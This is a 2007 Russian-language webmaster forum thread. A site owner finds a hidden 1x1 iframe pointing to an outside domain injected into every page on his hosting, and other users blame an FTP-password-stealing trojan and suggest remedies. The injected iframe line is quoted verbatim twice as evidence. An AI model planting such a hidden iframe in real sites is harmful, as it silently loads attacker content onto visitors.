| |
|
|
| | Вот мой сайт: http://anime.insyss.ru
С недавних пор он начал работать как-то не так. Он начал спрашиватьразрешение на запуск плагина. Я убрал окошко с запросом, а там в самом верху php-шная команда echo. Я не знаю от куда она взялась, но она там есть. Я залез в html и увидел это:
<body>echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1
height=1></iframe>";echo "";
|
От куда взялось - не знаю. А теперь внимание, вопросы:
1) От куда могло это появиться?
2) Куда жаловаться на этот сайт? Видимо, это именно он был инициатором хака?
Самое интересное, что в этом месте ничего не выводится скриптами и не инклюдится. То есть, это голых html! Еще обидней то, что похоже, хакал меня бот. Потому что любой нормальный человек запалил бы, что сайт написан на SSI+Perl. А у меня написано
echo "<iframe>......";
Самое интересное, что это не единственный мой сайт, где случилась такая беда. Причем, в другом месте я только что установил скрипты. Значит, это не может быть целенаправленной атакой на меня. | |
| |
|
|
| |
|
|
| |
для: SHAman
(03.05.2007 в 11:55)
| | | БЛИН! Только что проверил все свои сайты - везде одно и то же!
<body>echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";echo "";
|
Даже в обычном html-файле!!!! ЭТО КАК??? Что, хостер напортачил что-ли? Или что? Все эти сайты висят на одном хостинге, что, сервак ломанули что-ли? | |
| |
|
|
| |
|
|
| |
для: SHAman
(03.05.2007 в 12:46)
| | | поменяёте пароль на фтп и почистите машину с которой конектитесь в фтп серверу скорее всего троян сидит и тырит пароли на фтп | |
| |
|
|
| |
|
|
| |
для: KPETuH
(03.05.2007 в 12:55)
| | | Спасибо за совет, так и сделаю.
Вот только вопрос остался: кому нажаловаться, на нехороший сайт, который ставится iframe-ом? | |
| |
|
|
| |
|
|
| |
для: SHAman
(03.05.2007 в 11:55)
| | | >1) От куда могло это появиться?
Посмотрите логи FTP-доступа - нет ли левых обращений - если есть, то скорее всего троян упёр данные вашего FTP-аккаунта - сейчас это очень распространённая практика. Тащут откуда-то из штатов.
>2) Куда жаловаться на этот сайт? Видимо, это именно он был инициатором хака?
Владелец скажет, что не при делах... Максимум, что заказал раскрутку какой-нибудь безвестной группе, не подозревая о методах. | |
| |
|
|
| |
|
|
| |
для: cheops
(03.05.2007 в 13:04)
| | | Спасибо. Написал все-таки, на всякий случай, хостеру. Пущай разбираются. Ща ставлю антивири в срочном порядке и поменяю пароли.
Всем спасибо. | |
| |
|
|
| |
|
|
| |
для: SHAman
(03.05.2007 в 13:08)
| | | Срочно меняйте все пароли от ФТП и больше не заходите на ФТП через ТОТАЛ КОММАНДЕР! (Ну и через ОСЛИК тож не желательно)... У вас троян который в англую тыритвсе пароли от ФТП и прочее-прочее... сам сталкивался (и вот те раз, тож сайт по АНИМЕ) и где-то в инете нашёл тему на форуме где такое обсуждалось (к сожалению ссылку уже забыл, но мои рекомендации взяты с их форума) | |
| |
|
|
